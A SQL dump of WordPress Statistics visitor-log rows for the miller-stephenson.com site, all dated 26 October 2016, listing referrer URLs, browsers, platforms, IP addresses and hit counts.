INSERT INTO `wp_statistics_visitor` VALUES (11870, '2016-10-26', 'https://www.miller-stephenson.com', 'Domain', 'Unknown', 'Unknown', '', '167.114.156.198', '000', 1356, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11871, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11872, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '109.247.131.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11873, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '60.47.135.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11874, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.28.105.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11875, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11876, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.24.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11877, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.213.108.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11878, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.87.11.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11879, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '110.136.5.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11880, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '27.120.97.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11881, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.113.160.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11882, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '47.148.104.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11883, '2016-10-26', 'https://www.google.it/', 'Safari', 'iPhone', '10.0', '', '93.44.110.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11884, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '167.114.211.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11885, '2016-10-26', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.40.150.5', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11886, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.109.207.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11887, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.101.60.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11888, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.2125.102', '', '194.146.149.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11889, '2016-10-26', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.99', '', '104.223.30.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11890, '2016-10-26', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.223.30.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11891, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.28.105.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11892, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.140.234.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11893, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.46.81.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11894, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.255.168.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11895, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11896, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.236.223.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11897, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '136.243.16.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11898, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '16.0', '', '69.163.152.109', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11899, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '13.0', '', '69.163.152.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11900, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.232.57.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11901, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '129.232.154.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11902, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '146.0.74.195', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11903, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11904, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.28.95.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11905, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.238.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11906, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.0.204.203', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11907, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.84.169.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11908, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.121.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11909, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.189.192.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11910, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.103.205.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11911, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '197.158.83.168', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11912, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '41.63.159.126', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11913, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.132.236.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11914, '2016-10-26', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/krytox-xp-grease/', 'Chrome', 'Windows', '54.0.2840.71', '', '197.158.82.99', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11915, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.3.229.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11916, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.55.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11917, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '10.145.16.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11918, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '80.238.171.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11919, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.135.231.136', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11920, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.78.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11921, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.125.90.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11922, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.192.169.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11923, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.18.206.166', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11924, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '31.0.1650.63', '', '91.215.152.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11925, '2016-10-26', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '35.0.1916.153', '', '91.215.152.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11926, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.188.18.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11927, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.100.83.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11928, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.82.59.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11929, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.244.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11930, '2016-10-26', 'https://cheap-pills-norx.com/', 'Opera', 'Windows', '7.54', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11931, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.235.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11932, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '116.226.3.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11933, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '116.226.3.198', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11934, '2016-10-26', 'https://www.plusnetwork.com/?auto=&q=krytox+gpl226+.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '91.108.129.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11935, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '107.151.148.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11936, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.105.85.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11937, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '92.161.184.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11938, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.163.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11939, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '1.4.182.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11940, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.126.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11941, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.144.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11942, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '212.48.68.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11943, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.49.32.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11944, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.172.60.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11945, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.73.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11946, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.115.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11947, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '61.112.17.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11948, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.193.215.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11949, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.110.180.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11950, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.231.139.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11951, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.172.15.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11952, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.38.13.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11953, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.29.75.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11954, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '64.150.222.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11955, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.62.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11956, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.6.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11957, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '151.236.51.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11958, '2016-10-26', 'https://www.google.co.uk/', 'Opera Next', 'Windows', '36.0.2130.46', '', '185.71.153.78', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11959, '2016-10-26', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '91.185.147.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11960, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.228.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11961, '2016-10-26', 'https://www.miller-stephenson.com/tag/bdz/', 'Chrome', 'Windows', '46.0.2490.86', '', '188.92.75.244', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11962, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11963, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.6.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11964, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11965, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.29.124.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11966, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.108.79.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11967, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.164.254.45', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11968, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.244.89.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11969, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.147.242.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11970, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11971, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11972, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.94.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11973, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.90.179.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11974, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.183.40.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11975, '2016-10-26', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11976, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '110.232.248.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11977, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.34.194.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11978, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.61.62.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11979, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.247.209.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11980, '2016-10-26', 'https://www.google.co.il/', 'Chrome', 'Windows', '54.0.2840.71', '', '89.139.215.165', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11981, '2016-10-26', 'https://www.google.co.kr/', 'Chrome', 'Windows', '54.0.2840.71', '', '152.99.203.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11982, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.170.200.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11983, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.192.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11984, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.195.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11985, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.84.208.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11986, '2016-10-26', 'https://www.google.ru/', 'Chrome', 'Windows', '53.0.2785.143', '', '93.174.55.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11987, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.59.109.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11988, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.235.218.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11989, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.170.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11990, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.64.245.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11991, '2016-10-26', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '7.0', '', '107.161.85.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11992, '2016-10-26', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.3', '', '173.234.58.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11993, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.78.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11994, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.132.180.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11995, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.144.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11996, '2016-10-26', 'https://www.google.fr/', 'Chrome', 'Windows', '46.0.2490.80', '', '94.107.195.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11997, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11998, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '120.88.228.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11999, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '175.159.66.45', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12000, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.41.205.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12001, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.161.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12002, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.194.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12003, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.241.83.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12004, '2016-10-26', 'https://www.google.cz/', 'Chrome', 'Windows', '54.0.2840.71', '', '195.122.197.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12005, '2016-10-26', 'https://chelnytruck.ru/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12006, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.228.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12007, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12008, '2016-10-26', 'https://kinocccp.net/', 'Unknown', 'Unknown', 'Unknown', '', '46.119.119.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12009, '2016-10-26', 'https://profitsport.club/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12010, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.191.187.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12011, '2016-10-26', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.71', '', '212.56.102.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12012, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.140.7.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12013, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.77.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12014, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.98.90.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12015, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.6.216.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12016, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.172.14.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12017, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.150.255.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12018, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.225.77.71', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12019, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.158.75.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12020, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.252.73.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12021, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.146.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12022, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.59.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12023, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12024, '2016-10-26', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwjzyZG0j_jPAhUHzRQKHWQUDh4QjBAIJTAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&sig2=2Msb_i5BTKUSDP7jWL7qhQ&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '11.0', '', '62.159.205.220', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12025, '2016-10-26', 'https://www.google.pl/', 'Chrome', 'Windows', '53.0.2785.143', '', '213.172.183.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12026, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.150.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12027, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.234.121.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12028, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.178', '000', 1, 0); 
